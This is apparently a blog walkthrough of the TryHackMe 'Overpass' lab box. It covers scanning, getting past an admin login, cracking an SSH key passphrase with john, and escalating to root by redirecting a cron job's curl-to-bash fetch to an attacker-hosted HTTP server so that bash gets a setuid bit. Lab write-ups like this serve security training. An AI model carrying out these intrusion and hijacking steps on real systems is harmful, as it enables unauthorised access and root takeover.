TryHackMe - Overpass
Overpass
Hello guys, welcome back again! with another walkthrough this time we're moving through a box called "overpass" from TryHackMe.
Come on guys, let's move to the TryHackme website, login with your credentials then go to the learn option there search for "Overpass" select it and join the room. Before starting the machine you need to establish a connection with TryHackMe server using an openvpn. For that you click on the profile avatar ➡ Access ➡ Download my configuration file. Next you need to open your terminal and run these cmds:
➡ ls
➡ cd Downloads
➡ ls
➡ sudo openvpn (filename)
Now our ovpn connected successfully. Go back to THM website and select 'start machine', you will get an IP copy that IP and open new terminal switch to root user by using cmd: sudo su.
Scanning & Enumeration:
➡ nmap -A 10.10.137.248
After aggressive scanning we get that, port 22 & 80 are open. Now open browser and search that IP:
Directory Brute-Forcing:
We can't find any information from this page, so we go back to our terminal, and using gobuster we can find some more information.
➡ gobuster dir -u http://10.10.137.248/ -w /usr/share/wordlists/dirb/common.txt
Exploitation:
After running gobuster we get /admin, now we are going to search 10.10.137.248/admin. Then a login page opens, we going to crack that login page using Burpsuite. After that we get username= james and rsa private key like this:
Copy the rsa key, open terminal and save it:
➡ nano ssh.key
➡ ls
➡ cat ssh.key
Gaining Access:
➡ ssh -i ssh.key james@10.10.137.248
There shows to give password for the ssh.key, but we don't have a password.
➡ locate ssh2john.py
➡ /usr/share/john/ssh2john.py ssh.key
We going to save this hash file as hash.key.
➡ /usr/share/john/ssh2john.py ssh.key > hash.key
➡ ls
➡ cat hash.key
Now we going to crack the password from this hash file using john:
➡ john hash.key
We get password of the ssh.key, james13
Open new terminal and run cmd:
➡ sudo su
➡ ssh -i ssh.key james@10.10.137.248
User flag:
Now we are inside james@overpass-prod, and we run some familiar cmds:
➡ ls
➡ cat user.txt
➡ cat todo.txt
Successfully we get the user flag! copy and paste it on THM overpass website.
Privilege Escalation:
Firstly, try sudo -l to check that we can run as root, but we can't run as root. Then we run some cmds:
➡ cat /etc/crontab
➡ cat /etc/host
After this we need to change the IP of overpass.thm into our tun IP. For that run cmd and save it as our tunnel IP.
➡ nano /etc/hosts
To make it work properly we need to simulate the directory structe in the curl cmd. Start with creating directories:
➡ mkdir -p overpass.thm./downloads/src
In the src directory create a file:
➡ touch buildscript.sh
In the text editor we are going to add command we want the taget machine to execute after the curl command is piped to bash.
Easiest way to leverage our privileges is to add sticky bit to bash:
➡ nano buildscript.sh
Root flag:
Start a python server on your machine in the overpass.thm folder:
➡ python3 -m http.server 80
You will be noticed when the target machine will reach to download the script.
Wait a minute for the system to run the cron job and get root.
➡ /bin/bash -p
➡ whoami
➡ cd /root
Grab the root flag!
👍👍
ReplyDelete